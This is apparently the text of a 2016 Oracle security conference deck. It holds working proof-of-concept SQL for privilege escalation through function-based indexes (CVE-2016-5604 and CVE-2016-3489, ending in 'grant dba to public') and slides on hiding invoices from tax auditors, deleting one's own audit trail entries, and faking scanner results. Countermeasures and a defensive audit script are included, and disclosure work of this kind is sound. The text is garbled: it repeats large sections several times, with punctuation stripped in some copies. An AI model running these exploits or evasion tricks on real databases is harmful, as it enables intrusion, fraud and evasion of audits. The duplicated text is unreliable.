Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate the SQL statement.
Select value …
Oracle Data Redaction allows masking / manipulating the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN, … the DBA can decide what will be returned.
Select value …
A typical query from security checklists / scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> Audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as a man in the middle as well.
Possible approaches:
- modify views (e.g. add spare=DBA1 to the view dba_audit_trail): all entries of the OS user DBA1 will be removed from the view. If a SIEM solution retrieves the audit data, the entries from DBA1 are not retrieved.
- create or change synonyms to „redirect“ objects
- replace a table with a view / INSTEAD OF trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank ("The catastrophe in the database", Gunther Pipperr)
… where x=y
Where conditions can be changed using VPD.
VPD: add the where clause invoice_name = 'SAUNA_CLUB CHANTAL'
Hide „certain“ invoices from the audit department.
Select value from table/view where x=y
SQL Translation Framework (12c only) allows replacing an entire query: the user submits Query A, the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
- Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (the query gets a new SQL_ID)
- Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
- Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
- Always check the object type (is it really a table?)
- Use checksums for certain database objects (especially views)
- Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for applications.
(Huge) potential on critical systems to modify application logic (e.g. DB Vault).
DBAs and Auditors / Security Department should be aware of powerful Oracle features which could be used to modify application logic.
Audit these features even if not in use.
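As an added, defender-side inventory (not code from the deck), the following SQL*Plus script lists every hook shown above that can change what a query returns: redaction policies, VPD policies and EXEMPT ACCESS POLICY holders, SQL translation profiles and rules, public synonyms that redirect a name, the object type behind DUAL, checksums of selected SYS views, and the session's current schema. It assumes Oracle 12c dictionary views (REDACTION_POLICIES, DBA_SQL_TRANSLATIONS, DBMS_CRYPTO.HASH_SH256) and a DBA session; the list of views to checksum is a constructed example.

```sql
-- Added audit script, not from the original deck. Assumes 12c dictionary views and a
-- DBA session. Unqualified DUAL is avoided on purpose (see the countermeasure
-- "use fully qualified names instead of synonyms").
SET SERVEROUTPUT ON SIZE UNLIMITED

-- (1) Data Redaction: which columns are rewritten, how, and whether the policy is on.
SELECT p.object_owner, p.object_name, p.policy_name, p.enable,
       c.column_name, c.function_type, c.function_parameters
  FROM redaction_policies p
  JOIN redaction_columns c
    ON c.object_owner = p.object_owner AND c.object_name = p.object_name
 ORDER BY 1, 2, 5;

-- (2) VPD: the predicate function silently ANDed into every WHERE clause,
--     and everyone who may bypass it.
SELECT object_owner, object_name, policy_name, pf_owner, package, function,
       sel, ins, upd, del, enable
  FROM dba_policies
 ORDER BY 1, 2, 3;

SELECT grantee, admin_option
  FROM dba_sys_privs
 WHERE privilege = 'EXEMPT ACCESS POLICY';

-- (3) SQL Translation Framework: profiles, and the concrete "Query A -> Query B" rules.
SELECT owner, profile_name, translator
  FROM dba_sql_translation_profiles;

SELECT owner, profile_name, enabled, sql_text, translated_text
  FROM dba_sql_translations;

-- (4) Public synonyms whose name differs from the object they resolve to (the
--     DUAL -> SYS.MYDUAL redirection above), with the real object type behind the name.
--     Oracle ships a few legitimate aliases of this kind (CAT, DICT, OBJ, TABS, ...),
--     so diff the output against a baseline taken at installation.
SELECT s.synonym_name, s.table_owner, s.table_name, o.object_type, o.last_ddl_time
  FROM dba_synonyms s
  LEFT JOIN dba_objects o
    ON o.owner = s.table_owner AND o.object_name = s.table_name
   AND o.object_type IN ('TABLE', 'VIEW', 'SYNONYM', 'PACKAGE', 'FUNCTION', 'PROCEDURE')
 WHERE s.owner = 'PUBLIC'
   AND s.synonym_name <> s.table_name
 ORDER BY 1;

-- (5) Is it really a table? Object type of everything called DUAL, in any schema.
SELECT owner, object_name, object_type, status, last_ddl_time
  FROM dba_objects
 WHERE object_name = 'DUAL'
 ORDER BY 1, 3;

-- (6) Checksums of views worth watching (constructed list); store the output and
--     compare on the next run. DBA_VIEWS.TEXT is a LONG column, so it is fetched
--     into PL/SQL; the texts of these views are well below the 32767-byte limit.
DECLARE
  l_text VARCHAR2(32767);
BEGIN
  FOR v IN (SELECT owner, view_name, text
              FROM dba_views
             WHERE owner = 'SYS'
               AND view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS',
                                 'DBA_ROLE_PRIVS', 'DBA_SYS_PRIVS')) LOOP
    l_text := v.text;
    DBMS_OUTPUT.PUT_LINE(RPAD(v.owner || '.' || v.view_name, 32) || ' SHA-256 ' ||
      RAWTOHEX(DBMS_CRYPTO.HASH(UTL_RAW.CAST_TO_RAW(l_text), DBMS_CRYPTO.HASH_SH256)));
  END LOOP;
END;
/

-- (7) SYS-owned views changed after database creation. Patches do this as well,
--     so keep the patch history next to this output when reviewing it.
SELECT o.object_name, o.last_ddl_time
  FROM dba_objects o, v$database d
 WHERE o.owner = 'SYS' AND o.object_type = 'VIEW'
   AND o.last_ddl_time > d.created
 ORDER BY 2 DESC;

-- (8) Current schema check: a session whose CURRENT_SCHEMA differs from its
--     SESSION_USER resolves unqualified names in somebody else's schema.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;
```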
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of Auditing with SIEM solutions
Q & A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges
==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4
==> Now create an index on the table sys.incvid using a function-based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;

  COUNT(*)
----------
        11

July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA(1))
FEHLER in Zeile 1:
